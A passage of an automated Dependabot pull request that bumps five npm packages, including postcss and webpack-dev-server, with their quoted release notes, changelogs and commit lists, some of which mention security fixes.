bump","group_name":"npm_and_yarn","update_count":6,"packages":[{"name":"postcss","old_version":"8.5.6","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"fast-uri","old_version":"3.1.0","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 5 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [postcss](https://github.com/postcss/postcss) | `8.5.6` | `8.5.10` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.29.0` | `7.29.7` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.1.0` | `3.1.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n\n\nUpdates `postcss` from 8.5.6 to 8.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/33b9790263dc1562a46ce45d9532bd63e95b7986\"\u003e\u003ccode\u003e33b9790\u003c/code\u003e\u003c/a\u003e Release 8.5.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/536c79e4b01e58a3a56b09c3c0cf2323f4b9a28b\"\u003e\u003ccode\u003e536c79e\u003c/code\u003e\u003c/a\u003e Escape \u0026lt;/style\u0026gt; in CSS output (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/afa96b2a139ce625c4d27973313479c7c85f39d4\"\u003e\u003ccode\u003eafa96b2\u003c/code\u003e\u003c/a\u003e Update dependencies (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2073\"\u003e#2073\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/effe88bb87cabdc1876e02adbdd30f392f19f40d\"\u003e\u003ccode\u003eeffe88b\u003c/code\u003e\u003c/a\u003e Typo (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2072\"\u003e#2072\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/3ee79a2c4a11e41d52db50b444eebe38299495ad\"\u003e\u003ccode\u003e3ee79a2\u003c/code\u003e\u003c/a\u003e Thread model (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2071\"\u003e#2071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/2e0683daca4dc2919211b03774f6b2d137136c01\"\u003e\u003ccode\u003e2e0683d\u003c/code\u003e\u003c/a\u003e Create incident response docs (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/fe88ac29c06b7b218be32994cdc6ca1525bdf2c9\"\u003e\u003ccode\u003efe88ac2\u003c/code\u003e\u003c/a\u003e Release 8.5.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/c551632496b87ab3f1965bfda5dc386b6c71963e\"\u003e\u003ccode\u003ec551632\u003c/code\u003e\u003c/a\u003e Avoid RegExp when we can use simple JS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/89a6b744060eb8dee743351c785a9fbe37d4525a\"\u003e\u003ccode\u003e89a6b74\u003c/code\u003e\u003c/a\u003e Move SECURITY.txt for docs folder to keep GitHub page cleaner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/6ceb8a46af9f9de821faee98f861bdf84617347b\"\u003e\u003ccode\u003e6ceb8a4\u003c/code\u003e\u003c/a\u003e Create SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.5.6...8.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.29.0 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.1.0 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore scripts by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/150\"\u003efastify/fast-uri#150\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): remove \u003ccode\u003e@​fastify/pre-commit\u003c/code\u003e by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/151\"\u003efastify/fast-uri#151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/152\"\u003efastify/fast-uri#152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): add concurrency config by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/153\"\u003efastify/fast-uri#153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/154\"\u003efastify/fast-uri#154\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/156\"\u003efastify/fast-uri#156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(license): standardise license notice by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/159\"\u003efastify/fast-uri#159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estyle: remove trailing whitespace by \u003ca 